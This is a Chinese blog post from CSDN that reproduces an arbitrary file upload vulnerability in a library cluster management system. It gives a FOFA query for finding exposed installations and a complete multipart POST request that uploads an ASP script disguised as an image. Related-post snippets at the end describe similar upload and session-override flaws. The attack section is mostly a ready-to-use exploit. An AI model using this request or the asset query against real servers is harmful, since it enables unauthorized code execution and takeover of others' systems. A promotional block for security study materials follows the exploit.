【漏洞复现】云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(3)

最新推荐文章于 2024-07-26 09:50:12 发布
最新推荐文章于 2024-07-26 09:50:12 发布
阅读量387 收藏 9
点赞数 3
分类专栏: 程序员 文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84972726/article/details/138794851
版权
一、漏洞简介

云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。

二、影响版本

云图图书馆集群管理系统

三、资产测绘

fofa:body=“Login/scanwxusr”

image-20240326230247394

四、漏洞复现
POST /file/uploadfile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 176

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="vezvf.asp"
Content-Type: image/jpeg

<%Response.Write("test")%>
--00content0boundary00--

image-20240326225945315

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84972726
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
锐捷NBR路由器fileupload.php任意文件上传漏洞
xiaokp7的博客
09-13 1526
锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
大华智慧园区综合管理平台publishing任意文件上传漏洞
xiaokp7的博客
09-07 373
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击与控制。
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(2)
2401_84972703的博客
05-13 325
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
高校图书馆管理系统 php 漏洞,江苏汇文Libsys图书馆管理系统几处通用SQL注入漏洞...
weixin_35949264的博客
04-05 1090
漏洞存在于 Libsys图书馆管理系统 v3.5 目前有几十家高校在使用http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 北京吉利大学http://lib.math.ac.cn:8080/opac/item.php?marc_no=0000018842 中国科学院数学与系统科学研究院图书馆http://tsgl.nhic.edu.cn:...
使用postman传递参数时报错:Content type ‘multipart/form-data;boundary=--(略)
m0_37564426的博客
10-14 7515
原因是项目配置需要使用json格式参数, 因此在post方式下,在body中选择raw,然后填写json格式参数即可,如下 不同项目配置参数提交的方式也不同,因此遇到此类问题时可以尝试使用其他提交方式尝试。 ...
stl文件读取_matlab读取stl文件形成点云_读取stl文件_读取stl_形貌_形貌扫描云图_
10-03
STL(STereo Lithography)文件格式是一种广泛用于3D打印和计算机辅助设计(CAD)领域的文件格式。它主要存储三维几何模型的信息,通常由一系列三角面片组成,每个三角面片都包含三个顶点坐标和法线方向。在本场景中...
static3d20.rar_20节点_matlab应力云图_matlab结构云图_云图_有限元 3维
07-15
三维有限元静力问题分析程序,用Matlab编写,采用20节点3维单元,可绘制应力云图
origin做三维云图步骤说明.rar_origin 3d云图_origin make contour_origin画云图_st
09-23
在本教程中,我们将深入探讨如何使用Origin制作三维云图,以及如何利用make contour功能来构建云图。首先,我们需要了解一些基本概念。 **1. 三维云图** 三维云图是一种视觉化数据的方法,它能将多维数据以立体的...
Winform+KitWare.VTK绘制3D点云图,包含pcd、ply、obj等模型文件
10-17
在本文中,我们将深入探讨如何使用Winform结合KitWare的VTK库来绘制3D点云图,并处理包括pcd、ply和obj在内的多种模型文件。VTK(Visualization Toolkit)是一个开源的,跨平台的C++类库,专门用于科学数据和图像...
记一次无意间发现某学校图书检索系统的变量覆盖漏洞
tanw923的博客
08-09 2772
这是汇文OPAC很早就存在的一个严重漏洞 1. 利用存在漏洞参数的链接,访问存在漏洞文件,并覆盖 session 值 http://*******/opac/openlink_ebk.php?_SESSION[ADMIN_USER]=opac_admin 2.直接访问后台地址 http://********/admin/cfg_basic.php 3.后台可直接修改密码 数据库信息 4.总...
http Content-Type 中的boundary捣乱,导致服务端无法获取上传文件
热门推荐
u011090495的专栏
01-23 2万+
使用 httpcomponents httpclient 4.3.1 上传文件时服务端总是返回“需要可用的参数”,这个结果描述是应用自定义的,太过于笼统,得不到任何有用的信息。后来和服务器端一起调试才找到问题的根源。 客户端发送的 http Content-Type: Content-Type: multipart/form-data; boundary=rxU1IcP2kHsJVF37W5_
高校图书馆管理系统 php 漏洞,Libsys图书管理系统 V5.5 变量覆盖漏洞
weixin_34191685的博客
04-05 757
### 登陆页面```session_start( );if ( isset( $_REQUEST['username'] ) ){$strUser = trim( $_REQUEST['username'] );$strInput = trim( $_REQUEST['passwd'] );$strMsg = "用户名或者密码错误";switch ( $strUser ){case "opac_...
openresty实现图片(文件)服务器
ldaokun2006的专栏
10-24 3377
介绍前序该功能是利用openresty的lua脚本实现的图片(文件)保存功能,文件上传使用java代码开发的数据定义上传数据和文件信息不分前后,但系统只会保存最后一对信息
本地部署VMware ESXi服务实现无公网IP远程访问管理服务器
最新发布
weixin_44976692的博客
07-26 3281
在虚拟化技术日益成熟的今天,VMware ESXi以其卓越的性能和稳定性,成为了众多企业构建虚拟化环境的首选。然而,随着远程办公和跨地域管理的需求增加,如何高效地远程访问和管理部署在本地数据中心的ESXi服务器,成为了企业IT部门面临的重要挑战。传统的远程访问方式往往受限于网络配置复杂、IP地址固定以及安全性能不足等问题,难以满足现代企业对于灵活、安全、高效的远程管理需求。为了解决这一难题,我们可以借助Cpolar内网穿透技术,将本地ESXi服务器的访问能力扩展到公网,实现随时随地的远程访问和管理。
项目部署到服务器
2301_80034662的博客
07-25 437
下载MobaXterm。
Linux基础命令
weixin_68540670的博客
07-25 1492
Linux中一切从根开始Linux中一切皆文件。
云图科技Topo研发管理系统:一体化企业级协作解决方案
"云图科技提供的企业级研发管理与团队协作解决方案——TopoTM研发管理系统" 云图科技,全称为杭州云图科技有限公司,是中国在研发项目管理领域内的领军企业,自2009年成立以来,始终专注于为研发团队提供一体化的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值